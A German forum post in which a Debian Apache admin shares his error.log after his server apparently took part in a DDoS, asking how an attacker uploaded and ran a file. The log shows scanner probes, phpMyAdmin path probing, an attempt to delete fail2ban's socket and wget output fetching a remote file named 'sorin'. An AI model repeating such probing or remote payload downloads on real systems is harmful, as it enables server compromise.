Aller anschein nach, führte mein Apache2 einen DDoS aus. Leider bin ich selber schuld. hatte Safe_mode auf off gehabt in der php.ini.
hier mal meine Error.log
PHP Warning: Module 'mysql' already loaded in Unknown on line 0
[Mon May 02 11:29:41 2011] [notice] Apache/2.2.3 (Debian) PHP/5.2.0-8+etch16 configured -- resuming normal operations
[Mon May 02 13:45:14 2011] [error] [client 93.90.177.140] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Mon May 02 19:45:38 2011] [error] [client 69.162.74.102] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Tue May 03 07:07:47 2011] [error] [client 89.238.185.114] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.test0:)
[Tue May 03 20:18:55 2011] [error] [client 91.121.159.201] File does not exist: /var/www/w00tw00t.at.blackhats.romanian.anti-sec:)
[Tue May 03 20:18:55 2011] [error] [client 91.121.159.201] File does not exist: /var/www/phpMyAdmin
[Tue May 03 20:18:55 2011] [error] [client 91.121.159.201] File does not exist: /var/www/pma
[Tue May 03 20:18:55 2011] [error] [client 91.121.159.201] File does not exist: /var/www/myadmin
[Tue May 03 20:18:55 2011] [error] [client 91.121.159.201] File does not exist: /var/www/MyAdmin
rm: cannot remove `fail2ban.sock': Operation not permitted
--20:23:21-- http://czech.altervista.org/sorin
=> `sorin'
Resolving czech.altervista.org... 46.4.73.74
Connecting to czech.altervista.org|46.4.73.74|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 28,643 (28K) [text/plain]
0K .......... .......... ....... 100% 3.35 MB/s
20:23:21 (3.35 MB/s) - `sorin' saved [28643/28643]
Für mich stellt sich die Frage wie konnte er eine datei mit übern Apache hochladen und ausführen?